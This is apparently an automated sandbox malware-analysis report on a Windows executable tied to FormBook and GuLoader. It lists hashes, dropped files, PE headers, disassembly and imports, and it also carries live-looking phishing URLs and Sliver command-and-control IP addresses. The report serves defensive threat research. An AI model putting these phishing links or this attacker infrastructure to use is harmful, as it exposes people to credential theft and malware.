                                                https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                                • 45.33.74.79
                                                sshd.elfGet hashmaliciousSliverBrowse
                                                • 172.105.216.75
                                                1.exeGet hashmaliciousSliverBrowse
                                                • 172.105.216.75
                                                https://my-beell.github.io/login/Get hashmaliciousUnknownBrowse
                                                • 96.126.112.16
                                                http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet hashmaliciousPhisherBrowse
                                                • 69.164.218.144
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\sqlite3.dllInvoice-4536PND.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.docGet hashmaliciousFormBook, GuLoaderBrowse
                                                    Order.xlsGet hashmaliciousFormBookBrowse
                                                      Process:C:\Windows\SysWOW64\taskkill.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):451055
                                                      Entropy (8bit):7.998526110288202
                                                      Encrypted:true
                                                      SSDEEP:12288:t7JWkOde4uWwA4Uckz2rV7+a1BguT02hY72s2:tMhdBIhkqJ+aDxhYKs2
                                                      MD5:5D874A46532117F82095481976117FA1
                                                      SHA1:0A33FDEF5084DB25E24451DBDE80238B487FBE78
                                                      SHA-256:D6CCAB1423559C6CF50202BC81A4576F969AA9C275EAAEB9A2AC2C827CD60447
                                                      SHA-512:F0624277F3B4839C836291E1D1EB03CDA875BA192243427AFA967819B213F0CDADE02F22E20B786B4680E4FAAEF20C045AD0A456D5F85FC04D3AB2E081FF4C61
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:PK.........L......../.......sqlite3.defUT......Z...Zux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....
                                                      Process:C:\Windows\SysWOW64\taskkill.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                      Category:dropped
                                                      Size (bytes):77824
                                                      Entropy (8bit):1.133993246026424
                                                      Encrypted:false
                                                      SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                      MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                      SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                      SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                      SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\ncOLm62YLB.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.99395103644962
                                                      Encrypted:true
                                                      SSDEEP:6144:miFFTT0h0JTO1T1zWK9OOo2pGz8G2eaXTjdWdzJTyc1ILIsQqMknra:m2FchX5WpepdhBWdzJTyc0nQqlW
                                                      MD5:E42AB737789054A57D6F42ECBD8A9946
                                                      SHA1:BE79DA1D94898DF06EFCA02FFF33162B856D60C6
                                                      SHA-256:4B7008FEDDCFDA2B7618A2A07A9064A2150F8FAE46619A1299D776A87641C007
                                                      SHA-512:26983B6B9BCECBB6725A3D451C79612D46A08AEA35ED155467A62ED8F656FDBE9DC12E57D0536F1CB14E6E59E440DCF3E165CAB1B390BDD1732B7623FE9A37FB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:}.t..GB9D...?...u.L4...lD:...G30I1L7GB9DG2A6FG30I1L7GB9DG2A.FG3>V.B7.K.e.3..g.[Y:.<E(%K%*."W()\DiS).57Wd.\ar...]&U).JO3`G2A6FG3IH8..'%.y'U..& .*..'%.^..& .*..'%...Q).& .0I1L7GB9..2AzGF3.I.-7GB9DG2A.FE2;H:L7.F9DG2A6FG3.]1L7WB9D'6A6F.30Y1L7EB9BG2A6FG36I1L7GB9D'6A6DG30I1L5G..DG"A6VG30I!L7WB9DG2A&FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG3.=T4CGB9..6A6VG30.5L7WB9DG2A6FG30I1L.GBYDG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9DG2A6FG30I1L7GB9
                                                      Process:C:\Windows\SysWOW64\taskkill.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):451055
                                                      Entropy (8bit):7.998526110288202
                                                      Encrypted:true
                                                      SSDEEP:12288:t7JWkOde4uWwA4Uckz2rV7+a1BguT02hY72s2:tMhdBIhkqJ+aDxhYKs2
                                                      MD5:5D874A46532117F82095481976117FA1
                                                      SHA1:0A33FDEF5084DB25E24451DBDE80238B487FBE78
                                                      SHA-256:D6CCAB1423559C6CF50202BC81A4576F969AA9C275EAAEB9A2AC2C827CD60447
                                                      SHA-512:F0624277F3B4839C836291E1D1EB03CDA875BA192243427AFA967819B213F0CDADE02F22E20B786B4680E4FAAEF20C045AD0A456D5F85FC04D3AB2E081FF4C61
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:PK.........L......../.......sqlite3.defUT......Z...Zux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....
                                                      Process:C:\Windows\SysWOW64\taskkill.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):5167
                                                      Entropy (8bit):4.34771473123006
                                                      Encrypted:false
                                                      SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvrENw+Y0ac:E/Q+7Oc0JKOBF++EvrENw+cc
                                                      MD5:CD9B704B328573406D319F6E22E043BE
                                                      SHA1:FB88536357CF2A7DB522684887AFFD85AB5747DA
                                                      SHA-256:8274A340B59D469C27EB238A7984D250287C7820556A9E2693E8F1ECD907936A
                                                      SHA-512:869AC4A65380EC36254DE7309D84D5C98D4B280E71BDCC389F4689BC140EF86EA0EB3E736CB7E906417E40EBA79C33DD712CF67099AE26FFEECFF78130E2CA29
                                                      Malicious:false
                                                      Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                      Process:C:\Windows\SysWOW64\taskkill.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):861397
                                                      Entropy (8bit):6.507593641913457
                                                      Encrypted:false
                                                      SSDEEP:12288:jpzBGN/5Bglw5wEseqcxTHVf6SyZfG9xBBm5EhR9zpJR72Y/is:jO5jglzcqoViSyExrm5E79V7R/is
                                                      MD5:5FC6CD5D5CA1489D2A3C361717359A95
                                                      SHA1:5C630E232CD5761E7A611E41515BE4AFA3E7A141
                                                      SHA-256:85C8B8A648C56CF5F063912E0E26ECEBB90E0CAF2F442FD5CDD8287301FE7E81
                                                      SHA-512:5F9124A721F6B463D4F980920E87925098AA753B0FA2A59A3FF48B48D2B1A45D760FD46445414D84FB66321181CD2C82A4194361811114C15E35B42F838AB792
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: Invoice-4536PND.pdf.exe, Detection: malicious, Browse
                                                      • Filename: Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.doc, Detection: malicious, Browse
                                                      • Filename: Order.xls, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.J.........!.........>.....................a.......................................... .........................[....0..0....`.......................p...0...........................P.......................1...............................text...,...........................`.P`.data...............................@.`..rdata..............................@.`@.bss....(.............................`..edata..[........ ..................@.0@.idata..0....0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc...0...p...2..................@.0B/4...................D..............@.@B/19.................H..............@..B/31..........`......................@..B/45.................................@..B/57.................................@.0B/70.....i............$..
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.5614940673738245
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:ncOLm62YLB.exe
                                                      File size:1'400'845 bytes
                                                      MD5:ba75f7cc380fdd122467994b56ee9a1c
                                                      SHA1:2780a556ceb089824b3cfe22c056fb56798beb9b
                                                      SHA256:5e3562a7db4a4a4e1a7735346c32f004de20b841cdbcd06960aa3e7b17798357
                                                      SHA512:4dba996bd70ea89a1798cb01d868f2f8aa73579bcb54d6d0e3993aa51e4fa9bdfa4676d35cb433b11a972d77e5ad6d9570f27f987664de53016a8c66fc8d448c
                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCAWckvX92/QgJ9lWeSNLLNtM5CsH1a2:7JZoQrbTFZY1iaCnckf0qVNtM5CY/
                                                      TLSH:AA55F122F9C69076C2B323B19E7EF756963D693A0336D1D723C82D654EA00416B3A773
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                      Icon Hash:1733312925935517
                                                      Entrypoint:0x4165c1
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                      Instruction
                                                      call 00007FB9990F5F6Bh
                                                      jmp 00007FB9990ECDDEh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [ebp+0Ch]
                                                      mov ecx, dword ptr [ebp+10h]
                                                      mov edi, dword ptr [ebp+08h]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FB9990ECF5Ah
                                                      cmp edi, eax
                                                      jc 00007FB9990ED0F6h
                                                      cmp ecx, 00000080h
                                                      jc 00007FB9990ECF6Eh
                                                      cmp dword ptr [004A9724h], 00000000h
                                                      je 00007FB9990ECF65h
                                                      push edi
                                                      push esi
                                                      and edi, 0Fh
                                                      and esi, 0Fh
                                                      cmp edi, esi
                                                      pop esi
                                                      pop edi
                                                      jne 00007FB9990ECF57h
                                                      jmp 00007FB9990ED332h
                                                      test edi, 00000003h
                                                      jne 00007FB9990ECF66h
                                                      shr ecx, 02h
                                                      and edx, 03h
                                                      cmp ecx, 08h
                                                      jc 00007FB9990ECF7Bh
                                                      rep movsd
                                                      jmp dword ptr [00416740h+edx*4]
                                                      mov eax, edi
                                                      mov edx, 00000003h
                                                      sub ecx, 04h
                                                      jc 00007FB9990ECF5Eh
                                                      and eax, 03h
                                                      add ecx, eax
                                                      jmp dword ptr [00416654h+eax*4]
                                                      jmp dword ptr [00416750h+ecx*4]
                                                      nop
                                                      jmp dword ptr [004166D4h+ecx*4]
                                                      nop
                                                      inc cx
                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                      inc cx
                                                      add byte ptr [ebx], ah
                                                      ror dword ptr [edx-75F877FAh], 1
                                                      inc esi
                                                      add dword ptr [eax+468A0147h], ecx
                                                      add al, cl
                                                      jmp 00007FB99B565757h
                                                      add esi, 03h
                                                      add edi, 03h
                                                      cmp ecx, 08h
                                                      jc 00007FB9990ECF1Eh
                                                      rep movsd
                                                      jmp dword ptr [00000000h+edx*4]
                                                      Programming Language:
                                                      • [ C ] VS2010 SP1 build 40219
                                                      • [C++] VS2010 SP1 build 40219
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2010 SP1 build 40219
                                                      • [RES] VS2010 SP1 build 40219
                                                      • [LNK] VS2010 SP1 build 40219
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                      DLLImport
                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, 